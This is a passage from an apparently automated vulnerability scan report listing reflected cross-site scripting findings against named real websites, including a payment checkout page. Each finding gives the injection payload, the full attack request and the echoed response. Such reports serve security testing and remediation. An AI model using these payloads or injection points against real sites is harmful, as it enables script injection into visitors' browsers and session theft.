Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();
   if("fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5" != ""){
       evtStr = "fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5();";
       //alert("fire task: fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5 ");
       try{
    eval(evtStr);
       }catch(anErr){

...[SNIP]...

3.85. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the evt request parameter is copied into a JavaScript rest-of-line comment. The payload d308d%0aalert(1)//a380428d17 was submitted in the evt parameter. This input was echoed as d308d
alert(1)//a380428d17
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitActiond308d%0aalert(1)//a380428d17&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web24
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11097
Date: Mon, 09 May 2011 14:00:09 GMT
X-Varnish: 730031142
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();
   if("fireSphereOmInitActiond308d
alert(1)//a380428d17" != ""){
       evtStr = "fireSphereOmInitActiond308d
alert(1)//a380428d17();";
       //alert("fire task: fireSphereOmInitActiond308d
alert(1)//a380428d17
");
       try{
    eval(evtStr);
       }catch(anErr){
           //alert("Error: "+anErr.message + "Line: "+ ( anErr.number & 0xFFFF));
       }
   }
   
}


/*
// series of omniture methods

*/

// SphereOmniture.protot
...[SNIP]...

3.86. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the siteid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4550"%3balert(1)//1f690486bfe was submitted in the siteid parameter. This input was echoed as b4550";alert(1)//1f690486bfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinelb4550"%3balert(1)//1f690486bfe&evt=fireSphereOmInitAction&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web22
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11750
Date: Mon, 09 May 2011 14:02:24 GMT
X-Varnish: 877141020
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();

...[SNIP]...
ilters="javascript:,surphace.com";
       s_265.trackExternalLinks="true";
       s_265.prop1="";
       s_265.prop2="";
       s_265.prop12="http://www.surphace.com";
       s_265.prop16="siteid : " + "tribune_orlandosentinelb4550";alert(1)//1f690486bfe";
       s_265.prop18="inline";
       s_265.prop19='tribune_orlandosentinelb4550";alert(1)//1f690486bfe_inline';
       s_265.products=';tribune_orlandosentinelb4550";alert(1)//1f690486bfe';
s_265.e
...[SNIP]...

3.87. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the siteid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a86a'%3balert(1)//f26baafc484 was submitted in the siteid parameter. This input was echoed as 2a86a';alert(1)//f26baafc484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel2a86a'%3balert(1)//f26baafc484&evt=fireSphereOmInitAction&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web25
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11747
Date: Mon, 09 May 2011 14:02:24 GMT
X-Varnish: 877141082
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();

...[SNIP]...
.prop2="";
       s_265.prop12="http://www.surphace.com";
       s_265.prop16="siteid : " + "tribune_orlandosentinel2a86a';alert(1)//f26baafc484";
       s_265.prop18="inline";
       s_265.prop19='tribune_orlandosentinel2a86a';alert(1)//f26baafc484_inline';
       s_265.products=';tribune_orlandosentinel2a86a';alert(1)//f26baafc484';
s_265.events='prodview';
s_265.disablepihost=true;
s_265.mmxtitle="www
...[SNIP]...

3.88. https://www.ccnow.com/cgi-local/checkout.cgi [shipto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The value of the shipto request parameter is copied into an HTML comment. The payload 8876a--><script>alert(1)</script>ba066ed09fe940fd1 was submitted in the shipto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-local/checkout.cgi?action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Production&promo=0&returnurl=http%3A%2F%2Fasthmatickitty.com%2F&shipto=8876a--><script>alert(1)</script>ba066ed09fe940fd1&tkey=814744466213 HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:21 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950101; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:08:21 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- shipmod: asmakit 8876a--><script>alert(1)</script>ba066ed09fe940fd1 BC:US -->
...[SNIP]...

3.89. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db195"><a>bdf495dcb29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newsdb195"><a>bdf495dcb29/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:02:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=caeic5eid9f6nd9t57dlokn7u3; expires=Wed, 01-Jun-2011 17:35:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:02:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-newsdb195"><a>bdf495dcb29-sufjan-stevens-suffered-nervous-breakdown">
...[SNIP]...

3.90. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 772d1"><script>alert(1)</script>e9b4e9393e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/772d1"><script>alert(1)</script>e9b4e9393e8 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=vmgjs1vd6uc2gu9j83ucfc8851; expires=Wed, 01-Jun-2011 17:36:35 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=www.clashmusic.com/news/772d1"><script>alert(1)</script>e9b4e9393e8&amp;send=false&amp;layout=button_count&amp;width=100&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflo
...[SNIP]...

3.91. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903eb"><img%20src%3da%20onerror%3dalert(1)>18c5063c5f6 was submitted in the REST URL parameter 2. This input was echoed as 903eb"><img src=a onerror=alert(1)>18c5063c5f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown903eb"><img%20src%3da%20onerror%3dalert(1)>18c5063c5f6 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=tjdmale1ipd1kabf4v5e0t4923; expires=Wed, 01-Jun-2011 17:36:28 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page-news news sufjan-stevens-suffered-nervous-breakdown903eb"><img src=a onerror=alert(1)>18c5063c5f6 sufjan-stevens-suffered-nervous-breakdown903eb">
...[SNIP]...

3.92. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8894e--><img%20src%3da%20onerror%3dalert(1)>b663ab7f7e8 was submitted in the REST URL parameter 2. This input was echoed as 8894e--><img src=a onerror=alert(1)>b663ab7f7e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown8894e--><img%20src%3da%20onerror%3dalert(1)>b663ab7f7e8 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=uusndr194g17tjf06aubb5lvi3; expires=Wed, 01-Jun-2011 17:36:48 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in view view-page-news news sufjan-stevens-suffered-nervous-breakdown8894e--><img src=a onerror=alert(1)>b663ab7f7e8 sufjan-stevens-suffered-nervous-breakdown8894e-->
...[SNIP]...

3.93. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2264"><a>e81bc81cde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown?c2264"><a>e81bc81cde1=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=b838s9pkc05rq8dmhsgk95k6a3; expires=Wed, 01-Jun-2011 17:34:20 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:01:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in ntype-news node social-links node 55436 two-sidebars" id="page-news-sufjan-stevens-suffered-nervous-breakdown?c2264"><a>e81bc81cde1=1">
...[SNIP]...

3.94. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bbab"><script>alert(1)</script>e0199fca83b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown?9bbab"><script>alert(1)</script>e0199fca83b=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:47 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; expires=Wed, 01-Jun-2011 17:35:07 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:01:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab"><script>alert(1)</script>e0199fca83b=1&amp;send=false&amp;layout=button_count&amp;width=100&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=21" scrolling="no" frameborder="0" style="border:none; overf
...[SNIP]...

3.95. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1090"><a>da9ed195247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitesa1090"><a>da9ed195247/all/themes/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:04:54 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:04:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sitesa1090"><a>da9ed195247-all-themes-clash-favicon.ico">
...[SNIP]...

3.96. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f977"><a>af5a1119a31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all6f977"><a>af5a1119a31/themes/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:07:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all6f977"><a>af5a1119a31-themes-clash-favicon.ico">
...[SNIP]...

3.97. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

